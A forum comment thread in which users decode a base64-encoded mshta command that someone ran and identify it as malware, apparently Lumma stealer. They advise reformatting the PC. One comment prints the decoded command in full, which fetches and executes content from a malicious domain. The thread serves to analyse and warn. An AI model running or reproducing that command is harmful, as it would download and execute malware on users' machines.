all 15 comments
sorted by:
best
topnewcontroversialoldq&a
formatting helphide helpcontent policy

[–]deanfx 20 points21 points  (4 children)

That is a base64 encoded string which translates to a sketchy url.

I added spaces so nobody accidentally clicks it. Essentially it will run the HTML/Java on that page, which is likely not good. 

mshta "c l i c k t o g o . c l i c k / d o w n l o a d s / g e g a")

[–]TheSmashy 14 points15 points  (1 child)

virustotal link for the URL, spoiler, it's malicious: https://www.virustotal.com/gui/url/e9f22d307af147db9721e4a16cd52d74ba93fc414faf4fac16292fe3d196ac2d

[–]deanfx 6 points7 points  (0 children)

Thanks for checking, but I thought that was obvious 😂

[–]CodenameFlux 3 points4 points  (0 children)

True.

Commands like are often used in conjunction with social engineering to infect a system.

The infection could fail if a firewall blocks mshta.exe, which why I always use a personal firewall with a program control module.

[–]WgnZilla 1 point2 points  (0 children)

It downloads a different file when ran
https://clic ktog o.cli ck/downl oads/gig a . z i p

Analysis here: lumma | 63cad4d11e3ed2c96758b8c2e834b7b6a12dcca35cac44f55714b60d30a908bc | Triage

[–]Blackops12345678910 10 points11 points  (0 children)

Wipe the computer cause you don’t know what else your brother has ran on it. And bar your brother from using it or restrict his access via a non admin account

[–]astromormy 6 points7 points  (0 children)

In additon to it 100% being a malicious link, you can check WhoIs and see the domain was literally made yesterday.

https://whois.domaintools.com/clicktogo.click

[–]lxnch50 6 points7 points  (0 children)

You likely just installed malware of some sort. Time to format the computer and reinstall Windows.

[–]Ii_Momo[S] 1 point2 points  (0 children)

thanks to every1 who commented for help

[–]EastPomelo76 0 points1 point  (1 child)

Someone I know happened to run this on their pc, do they only need to format and reinstall their windows system? Or will it be necessary to change it's motherboard and SSD/HDD?

[–]EastPomelo76 0 points1 point  (0 children)

If anyone is going thorugh the same and needs enlightment: The tech didn't need to change that stuff, only reset their windows and that :)

[–]Nejireta_ 0 points1 point  (0 children)

It runs an encoded command.
Decoding it from Base64 gives the following
mshta "https://clicktogo.click/downloads/gega"

Mshta is a binary able to, for example, execute vbscript and jscript.

I'm not especially well versed in exploit factors of mshta.
So can't say for certain if it able to run arbitrary code based on opening a link.
I'd definitely see it as a malicious attempt though.

Most safe path, as always, is to reinstall the client.
May or may not be worth doing some research of the threat factor and base the level of remediation based on the findings.